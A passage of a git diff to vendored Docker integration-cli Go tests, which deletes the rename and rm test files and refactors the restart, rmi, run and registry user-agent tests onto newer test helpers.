fmt.Sprintf("%s/busybox", buildReg.hostport) + var ua string - pullReg, err := newTestRegistry(c) + reg, err := registry.NewMock(c) + defer reg.Close() c.Assert(err, check.IsNil) - registerUserAgentHandler(pullReg, &pullUA) - pullRepoName := fmt.Sprintf("%s/busybox", pullReg.hostport) + registerUserAgentHandler(reg, &ua) + repoName := fmt.Sprintf("%s/busybox", reg.URL()) - pushReg, err := newTestRegistry(c) - c.Assert(err, check.IsNil) - registerUserAgentHandler(pushReg, &pushUA) - pushRepoName := fmt.Sprintf("%s/busybox", pushReg.hostport) + s.d.StartWithBusybox(c, "--insecure-registry", reg.URL()) - loginReg, err := newTestRegistry(c) - c.Assert(err, check.IsNil) - registerUserAgentHandler(loginReg, &loginUA) - - err = s.d.Start( - "--insecure-registry", buildReg.hostport, - "--insecure-registry", pullReg.hostport, - "--insecure-registry", pushReg.hostport, - "--insecure-registry", loginReg.hostport, - "--disable-legacy-registry=true") + tmp, err := ioutil.TempDir("", "integration-cli-") c.Assert(err, check.IsNil) + defer os.RemoveAll(tmp) - dockerfileName, cleanup1, err := makefile(fmt.Sprintf("FROM %s", buildRepoName)) + dockerfile, err := makefile(tmp, fmt.Sprintf("FROM %s", repoName)) c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) - defer cleanup1() - s.d.Cmd("build", "--file", dockerfileName, ".") - regexpCheckUA(c, buildUA) - s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", loginReg.hostport) - regexpCheckUA(c, loginUA) + s.d.Cmd("build", "--file", dockerfile, tmp) + regexpCheckUA(c, ua) - s.d.Cmd("pull", pullRepoName) - regexpCheckUA(c, pullUA) + s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.URL()) + regexpCheckUA(c, ua) - dockerfileName, cleanup2, err := makefile(`FROM scratch - ENV foo bar`) - c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) - defer cleanup2() - s.d.Cmd("build", "-t", pushRepoName, "--file", dockerfileName, ".") + s.d.Cmd("pull", repoName) + regexpCheckUA(c, ua) - s.d.Cmd("push", pushRepoName) - regexpCheckUA(c, pushUA) + s.d.Cmd("tag", "busybox", repoName) + s.d.Cmd("push", repoName) + regexpCheckUA(c, ua) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go deleted file mode 100644 index 373d614b5e..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go +++ /dev/null @@ -1,138 +0,0 @@ -package main - -import ( - "strings" - - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/docker/docker/pkg/stringid" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestRenameStoppedContainer(c *check.C) { - out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") - - cleanedContainerID := strings.TrimSpace(out) - dockerCmd(c, "wait", cleanedContainerID) - - name := inspectField(c, cleanedContainerID, "Name") - newName := "new_name" + stringid.GenerateNonCryptoID() - dockerCmd(c, "rename", "first_name", newName) - - name = inspectField(c, cleanedContainerID, "Name") - c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) - -} - -func (s *DockerSuite) TestRenameRunningContainer(c *check.C) { - out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") - - newName := "new_name" + stringid.GenerateNonCryptoID() - cleanedContainerID := strings.TrimSpace(out) - dockerCmd(c, "rename", "first_name", newName) - - name := inspectField(c, cleanedContainerID, "Name") - c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) -} - -func (s *DockerSuite) TestRenameRunningContainerAndReuse(c *check.C) { - out, _ := runSleepingContainer(c, "--name", "first_name") - c.Assert(waitRun("first_name"), check.IsNil) - - newName := "new_name" - ContainerID := strings.TrimSpace(out) - dockerCmd(c, "rename", "first_name", newName) - - name := inspectField(c, ContainerID, "Name") - c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container")) - - out, _ = runSleepingContainer(c, "--name", "first_name") - c.Assert(waitRun("first_name"), check.IsNil) - newContainerID := strings.TrimSpace(out) - name = inspectField(c, newContainerID, "Name") - c.Assert(name, checker.Equals, "/first_name", check.Commentf("Failed to reuse container name")) -} - -func (s *DockerSuite) TestRenameCheckNames(c *check.C) { - dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh") - - newName := "new_name" + stringid.GenerateNonCryptoID() - dockerCmd(c, "rename", "first_name", newName) - - name := inspectField(c, newName, "Name") - c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name)) - - result := dockerCmdWithResult("inspect", "-f={{.Name}}", "--type=container", "first_name") - c.Assert(result, icmd.Matches, icmd.Expected{ - ExitCode: 1, - Err: "No such container: first_name", - }) -} - -func (s *DockerSuite) TestRenameInvalidName(c *check.C) { - runSleepingContainer(c, "--name", "myname") - - out, _, err := dockerCmdWithError("rename", "myname", "new:invalid") - c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) - c.Assert(out, checker.Contains, "Invalid container name", check.Commentf("%v", err)) - - out, _, err = dockerCmdWithError("rename", "myname") - c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) - c.Assert(out, checker.Contains, "requires exactly 2 argument(s).", check.Commentf("%v", err)) - - out, _, err = dockerCmdWithError("rename", "myname", "") - c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out)) - c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err)) - - out, _, err = dockerCmdWithError("rename", "", "newname") - c.Assert(err, checker.NotNil, check.Commentf("Renaming container with empty name should have failed: %s", out)) - c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err)) - - out, _ = dockerCmd(c, "ps", "-a") - c.Assert(out, checker.Contains, "myname", check.Commentf("Output of docker ps should have included 'myname': %s", out)) -} - -func (s *DockerSuite) TestRenameAnonymousContainer(c *check.C) { - testRequires(c, DaemonIsLinux) - - dockerCmd(c, "network", "create", "network1") - out, _ := dockerCmd(c, "create", "-it", "--net", "network1", "busybox", "top") - - anonymousContainerID := strings.TrimSpace(out) - - dockerCmd(c, "rename", anonymousContainerID, "container1") - dockerCmd(c, "start", "container1") - - count := "-c" - if daemonPlatform == "windows" { - count = "-n" - } - - _, _, err := dockerCmdWithError("run", "--net", "network1", "busybox", "ping", count, "1", "container1") - c.Assert(err, check.IsNil, check.Commentf("Embedded DNS lookup fails after renaming anonymous container: %v", err)) -} - -func (s *DockerSuite) TestRenameContainerWithSameName(c *check.C) { - out, _ := runSleepingContainer(c, "--name", "old") - ContainerID := strings.TrimSpace(out) - - out, _, err := dockerCmdWithError("rename", "old", "old") - c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed")) - c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err)) - - out, _, err = dockerCmdWithError("rename", ContainerID, "old") - c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed")) - c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err)) -} - -// Test case for #23973 -func (s *DockerSuite) TestRenameContainerWithLinkedContainer(c *check.C) { - testRequires(c, DaemonIsLinux) - - db1, _ := dockerCmd(c, "run", "--name", "db1", "-d", "busybox", "top") - dockerCmd(c, "run", "--name", "app1", "-d", "--link", "db1:/mysql", "busybox", "top") - dockerCmd(c, "rename", "app1", "app2") - out, _, err := dockerCmdWithError("inspect", "--format={{ .Id }}", "app2/mysql") - c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(db1)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go index 7d585289eb..1b4c928b9a 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go @@ -6,14 +6,13 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) func (s *DockerSuite) TestRestartStoppedContainer(c *check.C) { dockerCmd(c, "run", "--name=test", "busybox", "echo", "foobar") - cleanedContainerID, err := getIDByName("test") - c.Assert(err, check.IsNil) + cleanedContainerID := getIDByName(c, "test") out, _ := dockerCmd(c, "logs", cleanedContainerID) c.Assert(out, checker.Equals, "foobar\n") @@ -21,7 +20,7 @@ func (s *DockerSuite) TestRestartStoppedContainer(c *check.C) { dockerCmd(c, "restart", cleanedContainerID) // Wait until the container has stopped - err = waitInspect(cleanedContainerID, "{{.State.Running}}", "false", 20*time.Second) + err := waitInspect(cleanedContainerID, "{{.State.Running}}", "false", 20*time.Second) c.Assert(err, checker.IsNil) out, _ = dockerCmd(c, "logs", cleanedContainerID) @@ -35,22 +34,25 @@ func (s *DockerSuite) TestRestartRunningContainer(c *check.C) { c.Assert(waitRun(cleanedContainerID), checker.IsNil) - out, _ = dockerCmd(c, "logs", cleanedContainerID) - c.Assert(out, checker.Equals, "foobar\n") - - dockerCmd(c, "restart", "-t", "1", cleanedContainerID) + getLogs := func(c *check.C) (interface{}, check.CommentInterface) { + out, _ := dockerCmd(c, "logs", cleanedContainerID) + return out, nil + } - out, _ = dockerCmd(c, "logs", cleanedContainerID) + // Wait 10 seconds for the 'echo' to appear in the logs + waitAndAssert(c, 10*time.Second, getLogs, checker.Equals, "foobar\n") + dockerCmd(c, "restart", "-t", "1", cleanedContainerID) c.Assert(waitRun(cleanedContainerID), checker.IsNil) - c.Assert(out, checker.Equals, "foobar\nfoobar\n") + // Wait 10 seconds for first 'echo' appear (again) in the logs + waitAndAssert(c, 10*time.Second, getLogs, checker.Equals, "foobar\nfoobar\n") } // Test that restarting a container with a volume does not create a new volume on restart. Regression test for #819. func (s *DockerSuite) TestRestartWithVolumes(c *check.C) { prefix, slash := getPrefixAndSlashFromDaemonPlatform() - out, _ := runSleepingContainer(c, "-d", "-v", prefix+slash+"test") + out := runSleepingContainer(c, "-d", "-v", prefix+slash+"test") cleanedContainerID := strings.TrimSpace(out) out, err := inspectFilter(cleanedContainerID, "len .Mounts") @@ -73,6 +75,23 @@ func (s *DockerSuite) TestRestartWithVolumes(c *check.C) { c.Assert(source, checker.Equals, sourceAfterRestart) } +func (s *DockerSuite) TestRestartDisconnectedContainer(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace, NotArm) + + // Run a container on the default bridge network + out, _ := dockerCmd(c, "run", "-d", "--name", "c0", "busybox", "top") + cleanedContainerID := strings.TrimSpace(out) + c.Assert(waitRun(cleanedContainerID), checker.IsNil) + + // Disconnect the container from the network + out, err := dockerCmd(c, "network", "disconnect", "bridge", "c0") + c.Assert(err, check.NotNil, check.Commentf(out)) + + // Restart the container + dockerCmd(c, "restart", "c0") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + func (s *DockerSuite) TestRestartPolicyNO(c *check.C) { out, _ := dockerCmd(c, "create", "--restart=no", "busybox") @@ -147,7 +166,7 @@ func (s *DockerSuite) TestRestartContainerwithGoodContainer(c *check.C) { func (s *DockerSuite) TestRestartContainerSuccess(c *check.C) { testRequires(c, SameHostDaemon) - out, _ := runSleepingContainer(c, "-d", "--restart=always") + out := runSleepingContainer(c, "-d", "--restart=always") id := strings.TrimSpace(out) c.Assert(waitRun(id), check.IsNil) @@ -216,7 +235,7 @@ func (s *DockerSuite) TestRestartWithPolicyUserDefinedNetwork(c *check.C) { func (s *DockerSuite) TestRestartPolicyAfterRestart(c *check.C) { testRequires(c, SameHostDaemon) - out, _ := runSleepingContainer(c, "-d", "--restart=always") + out := runSleepingContainer(c, "-d", "--restart=always") id := strings.TrimSpace(out) c.Assert(waitRun(id), check.IsNil) @@ -250,7 +269,7 @@ func (s *DockerSuite) TestRestartContainerwithRestartPolicy(c *check.C) { id1 := strings.TrimSpace(string(out1)) id2 := strings.TrimSpace(string(out2)) waitTimeout := 15 * time.Second - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { waitTimeout = 150 * time.Second } err := waitInspect(id1, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout) @@ -259,14 +278,23 @@ func (s *DockerSuite) TestRestartContainerwithRestartPolicy(c *check.C) { dockerCmd(c, "restart", id1) dockerCmd(c, "restart", id2) + // Make sure we can stop/start (regression test from a705e166cf3bcca62543150c2b3f9bfeae45ecfa) dockerCmd(c, "stop", id1) dockerCmd(c, "stop", id2) dockerCmd(c, "start", id1) dockerCmd(c, "start", id2) + + // Kill the containers, making sure the are stopped at the end of the test + dockerCmd(c, "kill", id1) + dockerCmd(c, "kill", id2) + err = waitInspect(id1, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout) + c.Assert(err, checker.IsNil) + err = waitInspect(id2, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout) + c.Assert(err, checker.IsNil) } func (s *DockerSuite) TestRestartAutoRemoveContainer(c *check.C) { - out, _ := runSleepingContainer(c, "--rm") + out := runSleepingContainer(c, "--rm") id := strings.TrimSpace(string(out)) dockerCmd(c, "restart", id) @@ -275,4 +303,7 @@ func (s *DockerSuite) TestRestartAutoRemoveContainer(c *check.C) { out, _ = dockerCmd(c, "ps") c.Assert(out, checker.Contains, id[:12], check.Commentf("container should be restarted instead of removed: %v", out)) + + // Kill the container to make sure it will be removed + dockerCmd(c, "kill", id) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go deleted file mode 100644 index 0186c56741..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go +++ /dev/null @@ -1,86 +0,0 @@ -package main - -import ( - "io/ioutil" - "os" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestRmContainerWithRemovedVolume(c *check.C) { - testRequires(c, SameHostDaemon) - - prefix, slash := getPrefixAndSlashFromDaemonPlatform() - - tempDir, err := ioutil.TempDir("", "test-rm-container-with-removed-volume-") - if err != nil { - c.Fatalf("failed to create temporary directory: %s", tempDir) - } - defer os.RemoveAll(tempDir) - - dockerCmd(c, "run", "--name", "losemyvolumes", "-v", tempDir+":"+prefix+slash+"test", "busybox", "true") - - err = os.RemoveAll(tempDir) - c.Assert(err, check.IsNil) - - dockerCmd(c, "rm", "-v", "losemyvolumes") -} - -func (s *DockerSuite) TestRmContainerWithVolume(c *check.C) { - prefix, slash := getPrefixAndSlashFromDaemonPlatform() - - dockerCmd(c, "run", "--name", "foo", "-v", prefix+slash+"srv", "busybox", "true") - - dockerCmd(c, "rm", "-v", "foo") -} - -func (s *DockerSuite) TestRmContainerRunning(c *check.C) { - createRunningContainer(c, "foo") - - _, _, err := dockerCmdWithError("rm", "foo") - c.Assert(err, checker.NotNil, check.Commentf("Expected error, can't rm a running container")) -} - -func (s *DockerSuite) TestRmContainerForceRemoveRunning(c *check.C) { - createRunningContainer(c, "foo") - - // Stop then remove with -s - dockerCmd(c, "rm", "-f", "foo") -} - -func (s *DockerSuite) TestRmContainerOrphaning(c *check.C) { - dockerfile1 := `FROM busybox:latest - ENTRYPOINT ["true"]` - img := "test-container-orphaning" - dockerfile2 := `FROM busybox:latest - ENTRYPOINT ["true"] - MAINTAINER Integration Tests` - - // build first dockerfile - img1, err := buildImage(img, dockerfile1, true) - c.Assert(err, check.IsNil, check.Commentf("Could not build image %s", img)) - // run container on first image - dockerCmd(c, "run", img) - // rebuild dockerfile with a small addition at the end - _, err = buildImage(img, dockerfile2, true) - c.Assert(err, check.IsNil, check.Commentf("Could not rebuild image %s", img)) - // try to remove the image, should not error out. - out, _, err := dockerCmdWithError("rmi", img) - c.Assert(err, check.IsNil, check.Commentf("Expected to removing the image, but failed: %s", out)) - - // check if we deleted the first image - out, _ = dockerCmd(c, "images", "-q", "--no-trunc") - c.Assert(out, checker.Contains, img1, check.Commentf("Orphaned container (could not find %q in docker images): %s", img1, out)) - -} - -func (s *DockerSuite) TestRmInvalidContainer(c *check.C) { - out, _, err := dockerCmdWithError("rm", "unknown") - c.Assert(err, checker.NotNil, check.Commentf("Expected error on rm unknown container, got none")) - c.Assert(out, checker.Contains, "No such container") -} - -func createRunningContainer(c *check.C, name string) { - runSleepingContainer(c, "-dt", "--name", name) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go index cb16d9d88c..6622856823 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go @@ -2,13 +2,15 @@ package main import ( "fmt" - "os/exec" "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/docker/docker/pkg/stringid" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestRmiWithContainerFails(c *check.C) { @@ -61,84 +63,78 @@ func (s *DockerSuite) TestRmiTag(c *check.C) { } func (s *DockerSuite) TestRmiImgIDMultipleTag(c *check.C) { - out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-one'") - + out := cli.DockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-one'").Combined() containerID := strings.TrimSpace(out) // Wait for it to exit as cannot commit a running container on Windows, and // it will take a few seconds to exit - if daemonPlatform == "windows" { - err := waitExited(containerID, 60*time.Second) - c.Assert(err, check.IsNil) + if testEnv.OSType == "windows" { + cli.WaitExited(c, containerID, 60*time.Second) } - dockerCmd(c, "commit", containerID, "busybox-one") + cli.DockerCmd(c, "commit", containerID, "busybox-one") - imagesBefore, _ := dockerCmd(c, "images", "-a") - dockerCmd(c, "tag", "busybox-one", "busybox-one:tag1") - dockerCmd(c, "tag", "busybox-one", "busybox-one:tag2") + imagesBefore := cli.DockerCmd(c, "images", "-a").Combined() + cli.DockerCmd(c, "tag", "busybox-one", "busybox-one:tag1") + cli.DockerCmd(c, "tag", "busybox-one", "busybox-one:tag2") - imagesAfter, _ := dockerCmd(c, "images", "-a") + imagesAfter := cli.DockerCmd(c, "images", "-a").Combined() // tag busybox to create 2 more images with same imageID c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+2, check.Commentf("docker images shows: %q\n", imagesAfter)) imgID := inspectField(c, "busybox-one:tag1", "Id") // run a container with the image - out, _ = runSleepingContainerInImage(c, "busybox-one") - + out = runSleepingContainerInImage(c, "busybox-one") containerID = strings.TrimSpace(out) // first checkout without force it fails - out, _, err := dockerCmdWithError("rmi", imgID) - expected := fmt.Sprintf("conflict: unable to delete %s (cannot be forced) - image is being used by running container %s", stringid.TruncateID(imgID), stringid.TruncateID(containerID)) // rmi tagged in multiple repos should have failed without force - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, expected) + cli.Docker(cli.Args("rmi", imgID)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: fmt.Sprintf("conflict: unable to delete %s (cannot be forced) - image is being used by running container %s", stringid.TruncateID(imgID), stringid.TruncateID(containerID)), + }) - dockerCmd(c, "stop", containerID) - dockerCmd(c, "rmi", "-f", imgID) + cli.DockerCmd(c, "stop", containerID) + cli.DockerCmd(c, "rmi", "-f", imgID) - imagesAfter, _ = dockerCmd(c, "images", "-a") + imagesAfter = cli.DockerCmd(c, "images", "-a").Combined() // rmi -f failed, image still exists c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12], check.Commentf("ImageID:%q; ImagesAfter: %q", imgID, imagesAfter)) } func (s *DockerSuite) TestRmiImgIDForce(c *check.C) { - out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-test'") - + out := cli.DockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-test'").Combined() containerID := strings.TrimSpace(out) // Wait for it to exit as cannot commit a running container on Windows, and // it will take a few seconds to exit - if daemonPlatform == "windows" { - err := waitExited(containerID, 60*time.Second) - c.Assert(err, check.IsNil) + if testEnv.OSType == "windows" { + cli.WaitExited(c, containerID, 60*time.Second) } - dockerCmd(c, "commit", containerID, "busybox-test") + cli.DockerCmd(c, "commit", containerID, "busybox-test") - imagesBefore, _ := dockerCmd(c, "images", "-a") - dockerCmd(c, "tag", "busybox-test", "utest:tag1") - dockerCmd(c, "tag", "busybox-test", "utest:tag2") - dockerCmd(c, "tag", "busybox-test", "utest/docker:tag3") - dockerCmd(c, "tag", "busybox-test", "utest:5000/docker:tag4") + imagesBefore := cli.DockerCmd(c, "images", "-a").Combined() + cli.DockerCmd(c, "tag", "busybox-test", "utest:tag1") + cli.DockerCmd(c, "tag", "busybox-test", "utest:tag2") + cli.DockerCmd(c, "tag", "busybox-test", "utest/docker:tag3") + cli.DockerCmd(c, "tag", "busybox-test", "utest:5000/docker:tag4") { - imagesAfter, _ := dockerCmd(c, "images", "-a") + imagesAfter := cli.DockerCmd(c, "images", "-a").Combined() c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+4, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) } imgID := inspectField(c, "busybox-test", "Id") // first checkout without force it fails - out, _, err := dockerCmdWithError("rmi", imgID) - // rmi tagged in multiple repos should have failed without force - c.Assert(err, checker.NotNil) - // rmi tagged in multiple repos should have failed without force - c.Assert(out, checker.Contains, "(must be forced) - image is referenced in multiple repositories", check.Commentf("out: %s; err: %v;", out, err)) + cli.Docker(cli.Args("rmi", imgID)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "(must be forced) - image is referenced in multiple repositories", + }) - dockerCmd(c, "rmi", "-f", imgID) + cli.DockerCmd(c, "rmi", "-f", imgID) { - imagesAfter, _ := dockerCmd(c, "images", "-a") + imagesAfter := cli.DockerCmd(c, "images", "-a").Combined() // rmi failed, image still exists c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12]) } @@ -147,8 +143,8 @@ func (s *DockerSuite) TestRmiImgIDForce(c *check.C) { // See https://github.com/docker/docker/issues/14116 func (s *DockerSuite) TestRmiImageIDForceWithRunningContainersAndMultipleTags(c *check.C) { dockerfile := "FROM busybox\nRUN echo test 14116\n" - imgID, err := buildImage("test-14116", dockerfile, false) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "test-14116", build.WithDockerfile(dockerfile)) + imgID := getIDByName(c, "test-14116") newTag := "newtag" dockerCmd(c, "tag", imgID, newTag) @@ -175,12 +171,11 @@ func (s *DockerSuite) TestRmiTagWithExistingContainers(c *check.C) { func (s *DockerSuite) TestRmiForceWithExistingContainers(c *check.C) { image := "busybox-clone" - cmd := exec.Command(dockerBinary, "build", "--no-cache", "-t", image, "-") - cmd.Stdin = strings.NewReader(`FROM busybox -MAINTAINER foo`) - - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil, check.Commentf("Could not build %s: %s", image, out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "build", "--no-cache", "-t", image, "-"}, + Stdin: strings.NewReader(`FROM busybox +MAINTAINER foo`), + }).Assert(c, icmd.Success) dockerCmd(c, "run", "--name", "test-force-rmi", image, "/bin/true") @@ -206,14 +201,8 @@ func (s *DockerSuite) TestRmiForceWithMultipleRepositories(c *check.C) { tag1 := imageName + ":tag1" tag2 := imageName + ":tag2" - _, err := buildImage(tag1, - `FROM busybox - MAINTAINER "docker"`, - true) - if err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, tag1, build.WithDockerfile(`FROM busybox + MAINTAINER "docker"`)) dockerCmd(c, "tag", tag1, tag2) out, _ := dockerCmd(c, "rmi", "-f", tag2) @@ -241,8 +230,8 @@ func (s *DockerSuite) TestRmiContainerImageNotFound(c *check.C) { imageIds := make([]string, 2) for i, name := range imageNames { dockerfile := fmt.Sprintf("FROM busybox\nMAINTAINER %s\nRUN echo %s\n", name, name) - id, err := buildImage(name, dockerfile, false) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + id := getIDByName(c, name) imageIds[i] = id } @@ -270,9 +259,7 @@ RUN echo 0 #layer0 RUN echo 1 #layer1 RUN echo 2 #layer2 ` - _, err := buildImage(image, dockerfile, false) - c.Assert(err, checker.IsNil) - + buildImageSuccessfully(c, image, build.WithoutCache, build.WithDockerfile(dockerfile)) out, _ := dockerCmd(c, "history", "-q", image) ids := strings.Split(out, "\n") idToTag := ids[2] @@ -295,7 +282,7 @@ RUN echo 2 #layer2 // At this point we have 2 containers, one based on layer2 and another based on layer0. // Try to untag "tmp2" without the -f flag. - out, _, err = dockerCmdWithError("rmi", newTag) + out, _, err := dockerCmdWithError("rmi", newTag) // should not be untagged without the -f flag c.Assert(err, checker.NotNil) c.Assert(out, checker.Contains, cid[:12]) @@ -308,10 +295,9 @@ RUN echo 2 #layer2 } func (*DockerSuite) TestRmiParentImageFail(c *check.C) { - _, err := buildImage("test", ` + buildImageSuccessfully(c, "test", build.WithDockerfile(` FROM busybox - RUN echo hello`, false) - c.Assert(err, checker.IsNil) + RUN echo hello`)) id := inspectField(c, "busybox", "ID") out, _, err := dockerCmdWithError("rmi", id) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go index 9462aef800..aaaa7174d3 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go @@ -3,6 +3,7 @@ package main import ( "bufio" "bytes" + "context" "encoding/json" "fmt" "io" @@ -21,17 +22,21 @@ import ( "sync" "time" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/testutil" "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers/kernel" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/stringutils" "github.com/docker/docker/runconfig" "github.com/docker/go-connections/nat" "github.com/docker/libnetwork/resolvconf" "github.com/docker/libnetwork/types" "github.com/go-check/check" - libcontainerUser "github.com/opencontainers/runc/libcontainer/user" + "gotest.tools/icmd" ) // "test123" should be printed by docker run @@ -66,12 +71,12 @@ func (s *DockerSuite) TestRunLeakyFileDescriptors(c *check.C) { // this will fail when Internet access is unavailable func (s *DockerSuite) TestRunLookupGoogleDNS(c *check.C) { testRequires(c, Network, NotArm) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // nslookup isn't present in Windows busybox. Is built-in. Further, // nslookup isn't present in nanoserver. Hence just use PowerShell... - dockerCmd(c, "run", WindowsBaseImage, "powershell", "Resolve-DNSName", "google.com") + dockerCmd(c, "run", testEnv.PlatformDefaults.BaseImage, "powershell", "Resolve-DNSName", "google.com") } else { - dockerCmd(c, "run", DefaultImage, "nslookup", "google.com") + dockerCmd(c, "run", "busybox", "nslookup", "google.com") } } @@ -92,12 +97,12 @@ func (s *DockerSuite) TestRunExitCodeOne(c *check.C) { func (s *DockerSuite) TestRunStdinPipe(c *check.C) { // TODO Windows: This needs some work to make compatible. testRequires(c, DaemonIsLinux) - runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat") - runCmd.Stdin = strings.NewReader("blahblah") - out, _, _, err := runCommandWithStdoutStderr(runCmd) - if err != nil { - c.Fatalf("failed to run container: %v, output: %q", err, out) - } + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat"}, + Stdin: strings.NewReader("blahblah"), + }) + result.Assert(c, icmd.Success) + out := result.Stdout() out = strings.TrimSpace(out) dockerCmd(c, "wait", out) @@ -131,7 +136,7 @@ func (s *DockerSuite) TestRunDetachedContainerIDPrinting(c *check.C) { func (s *DockerSuite) TestRunWorkingDirectory(c *check.C) { dir := "/root" image := "busybox" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { dir = `C:/Windows` } @@ -154,9 +159,9 @@ func (s *DockerSuite) TestRunWorkingDirectory(c *check.C) { func (s *DockerSuite) TestRunWithoutNetworking(c *check.C) { count := "-c" image := "busybox" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { count = "-n" - image = WindowsBaseImage + image = testEnv.PlatformDefaults.BaseImage } // First using the long form --net @@ -289,7 +294,7 @@ func (s *DockerSuite) TestUserDefinedNetworkAlias(c *check.C) { testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) dockerCmd(c, "network", "create", "-d", "bridge", "net1") - cid1, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo1", "--net-alias=foo2", "busybox", "top") + cid1, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo1", "--net-alias=foo2", "busybox:glibc", "top") c.Assert(waitRun("first"), check.IsNil) // Check if default short-id alias is added automatically @@ -297,7 +302,7 @@ func (s *DockerSuite) TestUserDefinedNetworkAlias(c *check.C) { aliases := inspectField(c, id, "NetworkSettings.Networks.net1.Aliases") c.Assert(aliases, checker.Contains, stringid.TruncateID(id)) - cid2, _ := 